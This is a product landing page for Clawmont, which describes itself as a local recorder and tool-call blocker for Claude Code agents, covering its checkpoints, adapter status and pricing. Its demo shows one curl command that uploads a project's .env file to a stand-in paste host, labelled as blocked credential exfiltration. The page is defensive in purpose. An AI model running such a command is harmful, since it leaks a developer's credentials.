Record
Every call becomes evidence
Allowed or denied, each tool call becomes a hash-chained row on your own disk.
Clawmont records every Claude Code tool call locally, surfaces what mattered, and can stop a short list before it runs.
cat packages/api/.envallowedgrep PORT packages/api/.envallowedcurl -F env=@packages/api/.env https://paste.exampleblockedcredential exfiltrationRecord every call. Read only what matters. Refuse selected calls at the one boundary that can deny.
Record
Allowed or denied, each tool call becomes a hash-chained row on your own disk.
Read
The paid digest turns the trail into the moments worth opening.
Refuse
Opt in after you know your traffic. Only the tool-call boundary can deny.
| Tool calls recorded | every one | Allowed and denied alike. One hash-chained row each. |
|---|---|---|
| Boundaries inspected | 3 | Prompt, tool call and tool result, on the Claude Code path. |
| Boundaries that can deny | 1 | The tool call, judged before the command runs. |
| Where the trail lives | your disk | A file you own, not an account you rent. |
| How it starts | monitor | Nothing is refused until you turn the brake on. |
Clawmont is a local first flight recorder for Claude Code. It records every tool call to a hash-chained log on your own disk, inspects three conversation boundaries, and can deny at the tool-call boundary before the command runs. Your API keys never leave your machine.
We publish the detection rate, novel-attack rate, false-positive rate, corpus and measurement date, including results that got worse. Read the measured methodology on the security page.
The trail follows the agent loop. Only the tool-call checkpoint can refuse a call.
Checkpoint 01 · Prompt
Pasted credential material is stopped here. Injection signals raise context the model reads rather than a block, so treat this boundary as a recorder with one exception.
Checkpoint 02 · Tool call
Shell commands, file paths, outbound URLs and MCP arguments are judged at dispatch time, by what the call would do rather than what it looks like. This is the one boundary that can deny.
the only boundary that can refuse a call
Checkpoint 03 · Tool result
A fetched page, an MCP response or a command output can carry fresh instructions. Clawmont screens returned content and flags it. It does not replace it.
Checkpoint 04 · Output
Claude Code exposes an output rail and the installer deliberately leaves it off. The credential check behind it still reads ordinary file paths, API routes and environment-variable names as secrets. It ships when that is fixed and re-measured, not before.
Validated on device, never proxied or logged by Clawmont.
Editing one row breaks the hash chain and verify names the break.
No network call sits on the local decision path.
On 14 August 2026 auto mode became the default for new Claude Code sessions on Pro, Max and Team plans. A classifier now clears routine tool calls instead of you, and the reason the vendor gives for the change is approval fatigue.
The decision
Starting August 14, 2026, auto mode becomes the default permission mode for new sessions on Pro, Max, and Team plans.
The reason
Over time that leads to approval fatigue, where people stop paying close attention to what they're approving.
Clawmont does not put the prompt back. It writes down what the agent actually did, in order, so a decision nobody reviewed is still a decision you can read.
Bash and manual edits sit outside Claude Code rewind. Clawmont records those calls before you need the answer.
Rewinding does not affect files edited manually or via bash.
Bash and manual edits sit outside rewind. They are already in the trail before you need them.
shippedTurn the tool-call brake on once you have read a week of your own traffic. It starts off.
opt-inRestoring the state a call changed. On the roadmap, not in the product, not in the price.
not built yetPick an input. Watch the local decision layer mark it before the model sees it.
No banned phrase appears — this is scored on intent, so dropping or swapping a word doesn't get it past the layer.
This preview runs a deterministic subset of the engine in your browser. Installed, it adds stateful tracking across a whole session, the full bypass-tested corpus, a cost-gated judge for the ambiguous cases this preview does not run, and a hash-chained log on your own disk. Some attacks get through here; that's honest security, not theater. Exact measured rates and methodology at the security page and security.clawmont.com.
No attacker story required. The useful moment is often after the agent has already moved on.
It ran without you
The repo changed. The first useful question is simple: what did it touch?
The one you cannot take back
Most calls are harmless. The destructive one needs a decision before it runs.
A week later
Only a record that already exists can answer when it happened and how.
An adapter counts only after a real session and a real attack are watched end to end.
Claude Code is the verified lane today. Every other adapter stays visible, but not marketed, until its evidence clears the same standard.
Driven against a real session with a real attack, watched to a stop. This is the only state we sell, and today exactly one tool is in it.
Prompt, tool call and tool result inspected on your machine; the tool call is the boundary that can deny. Ships with a check that proves the hook is actually running.
The adapter is built and tested against the tool’s own schema, and no live session has been driven through it yet. We do not list these as supported, because they are not.
The integration cannot work until the tool changes something on its side. Named here so you can stop looking for it.
| Agent | State | What that means here |
|---|---|---|
| Claude Code | Verified | Prompt, tool call and tool result inspected on your machine; the tool call is the boundary that can deny. Ships with a check that proves the hook is actually running. |
| Cursor | In live-fire | The richest surface we have adapted, and the one with a trap: Cursor tries to run your Claude Code hooks and mostly fails at it, silently. Built, covered by a dialect test, not yet live-fired. |
| Codex CLI | In live-fire | Adapter and liveness check written. Codex will load a hook and decline to run it without a word, so this one does not ship as supported until a live run says otherwise. |
| Cline | In live-fire | Built against Cline’s own executor. A deny here ends the whole task rather than one call, so our false-positive measurements do not transfer and neither does the claim. |
| Devin CLI | In live-fire | Adapter emits the exit code Devin actually blocks on. What is left is the live run. (Windsurf / Cascade is a separate, end-of-life product — not this row.) |
| Aider | In live-fire | Aider publishes no hook system at all. Interception exists only by wrapping a private internal with no stability contract, so a rename in any release would disarm it. Treat it as unsupported. |
| Continue.dev | Blocked upstream | The hook engine is present in the shipped build and never fires. Nothing we write makes it run; this waits on Continue. |
Using OpenClaw? Its plugin inspects a fourth boundary. See OpenClaw security.
Seven days to judge it against your own traffic. Zero due today.
The full record of what your agent did, hash-chained on your own disk, with a receipt at the end of every run. No card, no expiry, and no detection held back.
Start recording freeNo card, and nothing to cancel.Or $9.99/month with an OpenClaw setup purchase.
$0 today. Cancel in the trial and pay nothing.Looking for a configured OpenClaw setup instead? See setup products.
Your keys never leave your machine
API keys are entered in your terminal during install and stored in your OS keychain. The browser never sees them.
No access to your code
Detection runs locally, inside the agent you already run. No repo access, nothing to grant.
No code stored on our servers
Optional cloud alerts send short, redacted alert metadata. Your codebase stays with you.
Licensed under BUSL-1.1 — not open source. The install script is published in full at clawmont.com/install.sh; read it before you run it.
Run it for a week. Read the receipt. Turn on brakes only if your traffic justifies them.
We use analytics cookies (PostHog: usage stats, heatmaps and session replay with all typed input masked) and first-party usage analytics to improve the site. Our basic traffic stats (Cloudflare) are cookieless. Privacy policy